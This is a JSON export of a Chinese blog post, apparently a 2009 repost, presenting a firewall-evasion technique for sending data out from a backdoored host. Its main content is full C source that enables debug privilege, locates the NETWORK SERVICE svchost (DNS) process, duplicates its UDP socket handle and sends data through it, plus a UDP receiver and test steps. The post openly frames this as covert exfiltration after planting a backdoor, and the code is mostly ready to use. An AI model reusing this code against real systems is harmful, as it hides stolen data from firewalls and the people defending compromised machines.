﻿{"id":120,"date":"2009-07-15T08:41:34","date_gmt":"2009-07-15T08:41:34","guid":{"rendered":""},"modified":"2011-11-18T16:58:50","modified_gmt":"2011-11-18T08:58:50","slug":"120","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/120.html","title":{"rendered":"\u4e00\u79cd\u65b0\u7684\u7a7f\u900f\u9632\u706b\u5899\u7684\u6570\u636e\u4f20\u8f93\u6280\u672f"},"content":{"rendered":"<p><span style=\"font-size: x-small;\">\u539f\u59cb\u51fa\u5904\uff1a<\/span><a href=\"http:\/\/www.cnxhacker.com\/\" target=\"_blank\"><span style=\"font-size: x-small;\">http:\/\/www.cnxhacker.com\/<\/span><\/a><br \/>\n<span style=\"font-size: x-small;\">\u4f7f\u7528\u8be5\u6280\u672f\u80cc\u666f\uff1a <\/span><\/p>\n<p>\u5728\u76ee\u6807\u4e3b\u673a\u5b89\u653e\u540e\u95e8\uff0c\u9700\u8981\u5c06\u6570\u636e\u4f20\u8f93\u51fa\u53bb\uff0c\u540c\u65f6\u6570\u636e\u5f88\u91cd\u8981\uff0c\u52a8\u4f5c\u4e0d\u80fd\u592a\u5927\u3002\u5176\u4ed6\u60c5\u51b5\u201c\u4e25\u91cd\u201d\u4e0d\u63a8\u8350\u4f7f\u7528\u8be5\u6280\u672f(\u540e\u9762\u6211\u4f1a\u8bb2\u5230\u4e3a\u4ec0\u4e48)\u3002<\/p>\n<p>\u9488\u5bf9\u76ee\u524d\u9632\u706b\u5899\u7684\u4e00\u4e9b\u60c5\u51b5\uff0c\u5982\u679c\u81ea\u5df1\u7684\u8fdb\u7a0b\u5f00\u4e00\u4e2a\u7aef\u53e3(\u751a\u81f3\u662f\u65b0\u5efa\u5957\u63a5\u5b57)\u80af\u5b9a\u88ab\u62e6\u3002\u76f8\u53cd\uff0c\u6709\u4e00\u70b9\u6211\u4eec\u4e5f\u5f88\u6e05\u695a\uff1a\u88ab\u9632\u706b\u5899\u9a8c\u8bc1\u7684\u8fdb\u7a0b\u5728\u4f20\u9001\u6570\u636e\u65f6\u6c38\u8fdc\u4e0d\u4f1a\u88ab\u62e6\u3002\u6240\u4ee5\uff0c\u6211\u7684\u601d\u8def\u5f88\u7b80\u5355\uff1a\u5c06\u5176\u4ed6\u8fdb\u7a0b\u4e2d\u5141\u8bb8\u6570\u636e\u4f20\u8f93\u7684\u5957\u63a5\u5b57\u53e5\u67c4\u62ff\u4e3a\u5df2\u7528\u3002<\/p>\n<p>\u8fc7\u7a0b\u5982\u4e0b\uff1a<\/p>\n<p>1. \u627e\u51fa\u76ee\u6807\u8fdb\u7a0b<\/p>\n<p>2. \u627e\u51faSOCKET\u53e5\u67c4<\/p>\n<p>2. \u7528DuplicateHandle()\u51fd\u6570\u5c06\u5176SOCKET\u8f6c\u6362\u4e3a\u80fd\u88ab\u81ea\u5df1\u4f7f\u7528<\/p>\n<p>3. \u7528\u8f6c\u6362\u540e\u7684SOCKET\u8fdb\u884c\u6570\u636e\u4f20\u8f93<br \/>\n\u4e0a\u9762\u7684\u8fc7\u7a0b\u5199\u7684\u5f88\u7b80\u5355\uff0c\u4f46\u662f\u5b9e\u9645\u5b9e\u73b0\u8d77\u6765\u8fd8\u662f\u5b58\u5728\u4e00\u4e9b\u95ee\u9898(\u540e\u9762\u518d\u505a<span class=\"t_tag\" onclick=\"tagshow(event)\">\u8ba8\u8bba<\/span>)\uff0c\u800c\u4e14\u4ece\u4e0a\u9762\u7684\u5b9e\u73b0\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u770b\u51fa\u4e00\u4e9b\u4e0d\u723d\u7684\u5730\u65b9\uff1a\u5728\u76ee\u6807\u8fdb\u7a0b\u7684SOCKET\u4e0d\u80fd\u662fTCP\uff0c\u56e0\u4e3aTCP\u7684\u53e5\u67c4\u5df2\u7ecf\u8ddf\u5916\u9762\u5efa\u7acb\u4e86\u8fde\u63a5\uff0c\u6240\u4ee5\u53ea\u80fd\u662fUDP\u3002\u9488\u5bf9\u4e0d\u540c\u7cfb\u7edf\u4e0d\u540c\u8fdb\u7a0b\u6211\u4eec\u5f88\u96be\u5b9a\u4f4d\u4e00\u4e2a\u7a33\u5b9a\u7684\u8fdb\u7a0bSOCKET\u3002<\/p>\n<p>\u770b\u5230\u4e0a\u9762\u8fd9\u4e9b\uff0c\u4f60\u6709\u70b9\u4e27\u6c14\u4e86\u5bf9\u4e0d\u5bf9\uff0c\u54c8\u54c8\u3002 \u518d\u60f3\u4e00\u60f3\uff0c\u5176\u5b9e\u6211\u4eec\u6709\u4e00\u6761\u771f\u6b63\u7684\u901a\u7f57\u9a6c\u7684\u201c\u9ec4\u91d1\u5927\u9053\u201d\u3002<\/p>\n<p>\u6211\u4eec\u77e5\u9053\u53ea\u8981\u4e00\u53f0\u8ba1\u7b97\u673a\u8fde\u4e0a\u4e86\u7f51\u7edc\uff0c\u90a3\u4e48\u6709\u4e00\u79cd\u6570\u636e\u4f20\u8f93\u662f\u80af\u5b9a\u4e0d\u4f1a\u88ab\u62e6\u622a\u7684\uff0c\u90a3\u5c31\u662fDNS\u3002\u4f60\u80fd\u60f3\u50cf\u57df\u540d\u89e3\u6790\u6570\u636e\u90fd\u88ab\u62e6\u4e86\u9020\u6210\u7684\u7ed3\u679c\u5417\uff1f \u563f\u563f\uff0c \u65e2\u7136\u8fd9\u4e2a\u662f\u6c38\u8fdc\u4e0d\u4f1a\u88ab\u62e6\u7684\uff0c \u800c\u4e14\u5b83\u53c8\u662fUDP\u4f20\u8f93\uff0c \u6211\u4eec\u5c31\u62ff\u4ed6\u5f00\u5200\u3002<\/p>\n<p>\u4e0b\u9762\u662f\u901a\u8fc7\u76f4\u63a5\u63a7\u5236DNS\u8fdb\u7a0b(\u5176\u5b9e\u4e5f\u5c31\u662fsvchost.exe\uff0c\u4e0d\u8fc7\u5bf9\u5e94\u7528\u6237\u540d\u662fNETWORK SERVICE)\u8fdb\u884c\u6570\u636e\u4f20\u8f93\u7684\u4f8b\u5b50\u3002\u7f16\u7a0b\u4e2d\u51fa\u73b0\u4e86\u5f88\u591a\u95ee\u9898\uff0c\u6bd4\u65b9\u8bf4\u83b7\u53d6svchost\u5bf9\u5e94\u7528\u6237\u540d\u65f6\u6ca1\u6709\u6743\u9650(\u4f46\u662f\u80fd\u591f\u64cd\u4f5cLOCAL SERVICE)\uff0c\u5728\u53e5\u67c4\u503c\u4e3a0x2c\u65f6\u8fdb\u884cgetsockname\u65f6\u4f1a\u505c\u6b62\u8fd0\u884c\u7b49\u7b49\u3002\u5177\u4f53\u89e3\u51b3\u65b9\u6cd5\u8bf7\u7ec6\u770b\u6ce8\u91ca\u90e8\u5206\u3002<\/p>\n<p>CODE:<\/p>\n<p>\/*++<\/p>\n<p>Made By ZwelL<\/p>\n<p><a href=\"mailto:zwell@sohu.com\"><span style=\"font-size: x-small;\">zwell@sohu.com<\/span><\/a><\/p>\n<p><span style=\"font-size: x-small;\">2005.4.12<\/span><\/p>\n<p>&#8211;*\/<\/p>\n<p>#include &lt;winsock2.h&gt;<\/p>\n<p>#include &lt;stdio.h&gt;<\/p>\n<p>#include &lt;wtsapi32.h&gt;<\/p>\n<p>#pragma comment(lib, &#8220;ws2_32&#8221;)<\/p>\n<p>#pragma comment(lib, &#8220;wtsapi32&#8221;)<\/p>\n<p>#define NT_SUCCESS(status)\u00a0 \u00a0 ((NTSTATUS)(status)&gt;=0)<\/p>\n<p>#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)<\/p>\n<p>typedef LONG\u00a0\u00a0NTSTATUS;<\/p>\n<p>typedef struct _SYSTEM_HANDLE_INFORMATION<\/p>\n<p>{<\/p>\n<p>ULONG\u00a0 \u00a0\u00a0\u00a0ProcessId;<\/p>\n<p>UCHAR\u00a0 \u00a0\u00a0\u00a0ObjectTypeNumber;<\/p>\n<p>UCHAR\u00a0 \u00a0\u00a0\u00a0Flags;<\/p>\n<p>USHORT\u00a0 \u00a0\u00a0\u00a0Handle;<\/p>\n<p>PVOID\u00a0 \u00a0\u00a0\u00a0Object;<\/p>\n<p>ACCESS_MASK\u00a0 \u00a0GrantedAccess;<\/p>\n<p>} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;<\/p>\n<p>typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);<\/p>\n<p>ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;<\/p>\n<p>BOOL LocateNtdllEntry ( void )<\/p>\n<p>{<\/p>\n<p>BOOL\u00a0\u00a0ret\u00a0 \u00a0 = FALSE;<\/p>\n<p>char\u00a0\u00a0NTDLL_DLL[] = &#8220;ntdll.dll&#8221;;<\/p>\n<p>HMODULE ntdll_dll\u00a0\u00a0= NULL;<\/p>\n<p>if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )<\/p>\n<p>{<\/p>\n<p>printf( &#8220;GetModuleHandle() failed&#8221;);<\/p>\n<p>return( FALSE );<\/p>\n<p>}<\/p>\n<p>if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress<\/p>\n<p>( ntdll_dll, &#8220;ZwQuerySystemInformation&#8221; ) ) )<\/p>\n<p>{<\/p>\n<p>goto LocateNtdllEntry_exit;<\/p>\n<p>}<\/p>\n<p>ret = TRUE;<\/p>\n<p>LocateNtdllEntry_exit:<\/p>\n<p>if ( FALSE == ret )<\/p>\n<p>{<\/p>\n<p>printf( &#8220;GetProcAddress() failed&#8221;);<\/p>\n<p>}<\/p>\n<p>ntdll_dll = NULL;<\/p>\n<p>return( ret );<\/p>\n<p>}<\/p>\n<p>\/*++<\/p>\n<p>This routine is used to get a process&amp;#39;s username from it&amp;#39;s SID<\/p>\n<p>&#8211;*\/<\/p>\n<p>BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)<\/p>\n<p>{<\/p>\n<p>\/\/ sanity checks and default value<\/p>\n<p>if (pUserSid == NULL)<\/p>\n<p>return false;<\/p>\n<p>strcpy(szUserName, &#8220;?&#8221;);<\/p>\n<p>SID_NAME_USE\u00a0\u00a0snu;<\/p>\n<p>TCHAR\u00a0 \u00a0 szUser[_MAX_PATH];<\/p>\n<p>DWORD\u00a0 \u00a0 chUser = _MAX_PATH;<\/p>\n<p>PDWORD\u00a0 \u00a0 pcchUser = &amp;chUser;<\/p>\n<p>TCHAR\u00a0 \u00a0 szDomain[_MAX_PATH];<\/p>\n<p>DWORD\u00a0 \u00a0 chDomain = _MAX_PATH;<\/p>\n<p>PDWORD\u00a0 \u00a0 pcchDomain = &amp;chDomain;<\/p>\n<p>\/\/ Retrieve user name and domain name based on user&amp;#39;s SID.<\/p>\n<p>if (<\/p>\n<p>::LookupAccountSid(<\/p>\n<p>NULL,<\/p>\n<p>pUserSid,<\/p>\n<p>szUser,<\/p>\n<p>pcchUser,<\/p>\n<p>szDomain,<\/p>\n<p>pcchDomain,<\/p>\n<p>&amp;snu<\/p>\n<p>)<\/p>\n<p>)<\/p>\n<p>{<\/p>\n<p>wsprintf(szUserName, &#8220;%s&#8221;, szUser);<\/p>\n<p>}<\/p>\n<p>else<\/p>\n<p>{<\/p>\n<p>return false;<\/p>\n<p>}<\/p>\n<p>return true;<\/p>\n<p>}<\/p>\n<p>\/*++<\/p>\n<p>This routine is used to get the DNS process&amp;#39;s Id<\/p>\n<p>Here, I use WTSEnumerateProcesses to get process user Sid,<\/p>\n<p>and then get the process user name. Beacause as it&amp;#39;s a &#8220;NETWORK SERVICE&#8221;,<\/p>\n<p>we cann&amp;#39;t use OpenProcessToken to catch the DNS process&amp;#39;s token information,<\/p>\n<p>even if we has the privilege in catching the SYSTEM&amp;#39;s.<\/p>\n<p>&#8211;*\/<\/p>\n<p>DWORD GetDNSProcessId()<\/p>\n<p>{<\/p>\n<p>PWTS_PROCESS_INFO pProcessInfo = NULL;<\/p>\n<p>DWORD\u00a0 \u00a0\u00a0\u00a0ProcessCount = 0;<\/p>\n<p>char\u00a0 \u00a0\u00a0\u00a0szUserName[255];<\/p>\n<p>DWORD\u00a0 \u00a0\u00a0\u00a0Id = -1;<\/p>\n<p>if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &amp;pProcessInfo, &amp;ProcessCount))<\/p>\n<p>{<\/p>\n<p>\/\/ dump each process description<\/p>\n<p>for (DWORD CurrentProcess = 0; CurrentProcess &lt; ProcessCount; CurrentProcess++)<\/p>\n<p>{<\/p>\n<p>if( strcmp(pProcessInfo[CurrentProcess].pProcessName, &#8220;svchost.exe&#8221;) == 0 )<\/p>\n<p>{<\/p>\n<p>GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);<\/p>\n<p>if( strcmp(szUserName, &#8220;NETWORK SERVICE&#8221;) == 0)<\/p>\n<p>{<\/p>\n<p>Id = pProcessInfo[CurrentProcess].ProcessId;<\/p>\n<p>break;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>WTSFreeMemory(pProcessInfo);<\/p>\n<p>}<\/p>\n<p>return Id;<\/p>\n<p>}<\/p>\n<p>\/*++<\/p>\n<p>This doesn&amp;#39;t work as we know, sign&#8230;<\/p>\n<p>but you can use the routine for other useing&#8230;<\/p>\n<p>&#8211;*\/<\/p>\n<p>\/*<\/p>\n<p>BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)<\/p>\n<p>{<\/p>\n<p>HANDLE hProcess = NULL,<\/p>\n<p>hAccessToken = NULL;<\/p>\n<p>TCHAR Info<span class=\"t_tag\" onclick=\"tagshow(event)\">Buffer<\/span>[1000], szDomainName[200];<\/p>\n<p>PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;<\/p>\n<p>DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;<\/p>\n<p>SID_NAME_USE snu;<\/p>\n<p>hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);<\/p>\n<p>if(hProcess == NULL)<\/p>\n<p>{<\/p>\n<p>printf(&#8220;OpenProcess wrong&#8221;);<\/p>\n<p>CloseHandle(hProcess);<\/p>\n<p>return false;<\/p>\n<p>}<\/p>\n<p>if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&amp;hAccessToken))<\/p>\n<p>{<\/p>\n<p>printf(&#8220;OpenProcessToken wrong:%08x&#8221;, GetLastError());<\/p>\n<p>return false;<\/p>\n<p>}<\/p>\n<p>GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,<\/p>\n<p>1000, &amp;dwInfoBufferSize);<\/p>\n<p>LookupAccountSid(NULL, pTokenUser-&gt;User.Sid, szAccountName,<\/p>\n<p>&amp;dwAccountSize,szDomainName, &amp;dwDomainSize, &amp;snu);<\/p>\n<p>if(hProcess)<\/p>\n<p>CloseHandle(hProcess);<\/p>\n<p>if(hAccessToken)<\/p>\n<p>CloseHandle(hAccessToken);<\/p>\n<p>return true;<\/p>\n<p>}*\/<\/p>\n<p>\/*++<\/p>\n<p>Now, it is the most important stuff&#8230; ^_^<\/p>\n<p>&#8211;*\/<\/p>\n<p>SOCKET GetSocketFromId (DWORD PID)<\/p>\n<p>{<\/p>\n<p>NTSTATUS\u00a0 \u00a0\u00a0 \u00a0\u00a0\u00a0status;<\/p>\n<p>PVOID\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0buf\u00a0\u00a0= NULL;<\/p>\n<p>ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0size = 1;<\/p>\n<p>ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0NumOfHandle = 0;<\/p>\n<p>ULONG\u00a0 \u00a0\u00a0 \u00a0\u00a0 \u00a0i;<\/p>\n<p>PSYSTEM_HANDLE_INFORMATION\u00a0\u00a0h_info = NULL;<\/p>\n<p>HANDLE\u00a0\u00a0sock = NULL;<\/p>\n<p>DWORD\u00a0\u00a0n;<\/p>\n<p>buf=malloc(0x1000);<\/p>\n<p>if(buf == NULL)<\/p>\n<p>{<\/p>\n<p>printf(&#8220;malloc wrong<br \/>\n&#8220;);<\/p>\n<p>return NULL;<\/p>\n<p>}<\/p>\n<p>status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &amp;n );<\/p>\n<p>if(STATUS_INFO_LENGTH_MISMATCH == status)<\/p>\n<p>{<\/p>\n<p>free(buf);<\/p>\n<p>buf=malloc(n);<\/p>\n<p>if(buf == NULL)<\/p>\n<p>{<\/p>\n<p>printf(&#8220;malloc wrong<br \/>\n&#8220;);<\/p>\n<p>return NULL;<\/p>\n<p>}<\/p>\n<p>status = ZwQuerySystemInformation( 0x10, buf, n, NULL);<\/p>\n<p>}<\/p>\n<p>else<\/p>\n<p>{<\/p>\n<p>printf(&#8220;ZwQuerySystemInformation wrong<br \/>\n&#8220;);<\/p>\n<p>return NULL;<\/p>\n<p>}<\/p>\n<p>NumOfHandle = *(ULONG*)buf;<\/p>\n<p>h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);<\/p>\n<p>for(i = 0; i&lt;NumOfHandle ;i++)<\/p>\n<p>{<\/p>\n<p>try<\/p>\n<p>{<\/p>\n<p>if( ( h_info<span style=\"font-size: x-small;\">.ProcessId == PID ) &amp;&amp; ( h_info<\/span><span style=\"font-size: x-small;\">.ObjectTypeNumber == 0x1c ) <\/span><\/p>\n<p>&amp;&amp; (h_info<span style=\"font-size: x-small;\">.Handle!=0x2c)\u00a0\u00a0\/\/ I don&amp;#39;t know why if the Handle equal to 0x2c,<\/span><\/p>\n<p>in my test, it stops at getsockname()<\/p>\n<p>\/\/ So I jump over this situation&#8230;<\/p>\n<p>\/\/ May be it&amp;#39;s different in your system,<\/p>\n<p>) \/\/wind2000 is 0x1a<\/p>\n<p>{<\/p>\n<p>\/\/printf(&#8220;Handle:0x%x Type:%08x<br \/>\n&#8220;,h_info<span style=\"font-size: x-small;\">.Handle, h_info<\/span><span style=\"font-size: x-small;\">.ObjectTypeNumber);<\/span><\/p>\n<p>if( 0 == DuplicateHandle(<\/p>\n<p>OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),<\/p>\n<p>(HANDLE)h_info<span style=\"font-size: x-small;\">.Handle, <\/span><\/p>\n<p>GetCurrentProcess(),<\/p>\n<p>&amp;sock,<\/p>\n<p>STANDARD_RIGHTS_REQUIRED,<\/p>\n<p>true,<\/p>\n<p>DUPLICATE_SAME_ACCESS)<\/p>\n<p>)<\/p>\n<p>{<\/p>\n<p>printf(&#8220;DuplicateHandle wrong:%8x&#8221;, GetLastError());<\/p>\n<p>continue;<\/p>\n<p>}<\/p>\n<p>\/\/printf(&#8220;DuplicateHandle ok<br \/>\n&#8220;);<\/p>\n<p>sockaddr_in name = {0};<\/p>\n<p>name.sin_family = AF_INET;<\/p>\n<p>int namelen = sizeof(sockaddr_in);<\/p>\n<p>getsockname( (SOCKET)sock, (sockaddr*)&amp;name, &amp;namelen );<\/p>\n<p>\/\/printf(&#8220;PORT=%5d<br \/>\n&#8220;,\u00a0\u00a0ntohs( name.sin_port ));<\/p>\n<p>if(ntohs(name.sin_port)&gt;0)\u00a0\u00a0\/\/ if port &gt; 0, then we can use it<\/p>\n<p>break;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>catch(&#8230;)<\/p>\n<p>{<\/p>\n<p>continue;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>if ( buf != NULL )<\/p>\n<p>{<\/p>\n<p>free( buf );<\/p>\n<p>}<\/p>\n<p>return (SOCKET)sock;<\/p>\n<p>}<\/p>\n<p>\/*++<\/p>\n<p>This is not required&#8230;<\/p>\n<p>&#8211;*\/<\/p>\n<p>BOOL EnablePrivilege (PCSTR name)<\/p>\n<p>{<\/p>\n<p>HANDLE hToken;<\/p>\n<p>BOOL rv;<\/p>\n<p>TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };<\/p>\n<p>LookupPrivilegeValue (<\/p>\n<p>0,<\/p>\n<p>name,<\/p>\n<p>&amp;priv.Privileges[0].Luid<\/p>\n<p>);<\/p>\n<p>priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;<\/p>\n<p>OpenProcessToken(<\/p>\n<p>GetCurrentProcess (),<\/p>\n<p>TOKEN_ADJUST_PRIVILEGES,<\/p>\n<p>&amp;hToken<\/p>\n<p>);<\/p>\n<p>AdjustTokenPrivileges (<\/p>\n<p>hToken,<\/p>\n<p>FALSE,<\/p>\n<p>&amp;priv,<\/p>\n<p>sizeof priv,<\/p>\n<p>0,<\/p>\n<p>0<\/p>\n<p>);<\/p>\n<p>rv = GetLastError () == ERROR_SUCCESS;<\/p>\n<p>CloseHandle (hToken);<\/p>\n<p>return rv;<\/p>\n<p>}<\/p>\n<p>void main()<\/p>\n<p>{<\/p>\n<p>WSADATA wsaData;<\/p>\n<p>char\u00a0\u00a0testbuf[255];<\/p>\n<p>SOCKET\u00a0\u00a0sock;<\/p>\n<p>sockaddr_in RecvAddr;<\/p>\n<p>int iResult = WSAStartup(MAKEWORD(2,2), &amp;wsaData);<\/p>\n<p>if (iResult != NO_ERROR)<\/p>\n<p>printf(&#8220;Error at WSAStartup()<br \/>\n&#8220;);<\/p>\n<p>if(!LocateNtdllEntry())<\/p>\n<p>return;<\/p>\n<p>if(!EnablePr<br \/>\nivilege (SE_DEBUG_NAME)) { printf(&#8220;EnablePrivilege wrong<br \/>\n&#8220;); return; } sock = GetSocketFromId(GetDNSProcessId()); if( sock==NULL) { printf(&#8220;GetSocketFromId wrong<br \/>\n&#8220;); return; } \/\/Change there value&#8230; RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons(5555); RecvAddr.sin_addr.s_addr = inet_addr(&#8220;127.0.0.1&#8221;); if(SOCKET_ERROR == sendto(sock, &#8220;test&#8221;, 5, 0, (SOCKADDR *) &amp;RecvAddr, sizeof(RecvAddr))) { printf(&#8220;sendto wrong:%d<br \/>\n&#8220;, WSAGetLastError()); } else { printf(&#8220;send ok&#8230; Have fun, right? ^_^<br \/>\n&#8220;); } getchar(); \/\/WSACleanup(); return; } [Copy to clipboard]<\/p>\n<p>\u5f88\u65e9\u4ee5\u524d\u6211\u5c31\u6709\u8fd9\u4e2a\u60f3\u6cd5\u4e86\uff0c\u53ea\u662f\u4e00\u76f4\u6ca1\u6709\u53bb\u5b9e\u73b0\u3002\u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u56e0\u4e3a\u8981\u627e\u51faDNS\u8fdb\u7a0b\u53e5\u67c4\uff0c\u800csvchost.exe\u53c8\u6709\u591a\u4e2a\uff0c\u6240\u4ee5\u4ee5\u7528\u6237\u540d\u6765\u8fdb\u884c\u5224\u65ad\uff0c\u672c\u6765\u662f\u7528OpenProcessToken\uff0c\u4f46\u662f\u600e\u4e48\u4e5f\u4e0d\u884c\u3002\u6240\u4ee5\u6362\u4e2a\u65b9\u6cd5\uff0c\u7528\u5230\u4e86wtsapi32\u5e93\u51fd\u6570\u3002<\/p>\n<p>\u518d\u7528\u4e0b\u9762\u7684\u4ee3\u7801\u6d4b\u8bd5\uff1a<\/p>\n<p>CODE:<\/p>\n<p>\/*++<\/p>\n<p>UdpReceiver<\/p>\n<p>&#8211;*\/<\/p>\n<p>#include &lt;stdio.h&gt;<\/p>\n<p>#include &#8220;winsock2.h&#8221;<\/p>\n<p>#pragma comment(lib, &#8220;ws2_32&#8221;)<\/p>\n<p>void main()<\/p>\n<p>{<\/p>\n<p>WSADATA wsaData;<\/p>\n<p>SOCKET RecvSocket;<\/p>\n<p>sockaddr_in RecvAddr;<\/p>\n<p>int Port = 5555;<\/p>\n<p>char RecvBuf[1024];<\/p>\n<p>int BufLen = 1024;<\/p>\n<p>sockaddr_in SenderAddr;<\/p>\n<p>int SenderAddrSize = sizeof(SenderAddr);<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Initialize Winsock<\/p>\n<p>WSAStartup(MAKEWORD(2,2), &amp;wsaData);<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Create a receiver socket to receive datagrams<\/p>\n<p>RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Bind the socket to any address and the specified port.<\/p>\n<p>RecvAddr.sin_family = AF_INET;<\/p>\n<p>RecvAddr.sin_port = htons(Port);<\/p>\n<p>RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);<\/p>\n<p>bind(RecvSocket, (SOCKADDR *) &amp;RecvAddr, sizeof(RecvAddr));<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Call the recvfrom function to receive datagrams<\/p>\n<p>\/\/ on the bound socket.<\/p>\n<p>printf(&#8220;Receiving datagrams&#8230;<br \/>\n&#8220;);<\/p>\n<p>while(1)<\/p>\n<p>{<\/p>\n<p>recvfrom(RecvSocket,<\/p>\n<p>RecvBuf,<\/p>\n<p>BufLen,<\/p>\n<p>0,<\/p>\n<p>(SOCKADDR *)&amp;SenderAddr,<\/p>\n<p>&amp;SenderAddrSize);<\/p>\n<p>printf(&#8220;%s<br \/>\n&#8220;, RecvBuf);<\/p>\n<p>}<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Close the socket when finished receiving datagrams<\/p>\n<p>printf(&#8220;Finished receiving. Closing socket.<br \/>\n&#8220;);<\/p>\n<p>closesocket(RecvSocket);<\/p>\n<p>\/\/&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>\/\/ Clean up and exit.<\/p>\n<p>printf(&#8220;Exiting.<br \/>\n&#8220;);<\/p>\n<p>WSACleanup();<\/p>\n<p>return;<\/p>\n<p>}<\/p>\n<p>[Copy to clipboard]<br \/>\n\u6d4b\u8bd5\u6b65\u9aa4\uff1a<\/p>\n<p>1. \u5728\u4e00\u53f0\u673a\u5668\u4e0a\u6267\u884cUdpReceiver\u3002<\/p>\n<p>2. \u5728\u5b89\u88c5\u9632\u706b\u5899\u7684\u673a\u5668\u4e0a\u6267\u884c\u7b2c\u4e00\u4e2a\u7a0b\u5e8f\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u539f\u59cb\u51fa\u5904\uff1ahttp:\/\/www.cnxhacker.com\/ \u4f7f\u7528\u8be5\u6280\u672f\u80cc\u666f\uff1a  &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/120.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[111],"class_list":["post-120","post","type-post","status-publish","format-standard","hentry","tag-111"],"views":805,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=120"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/120\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}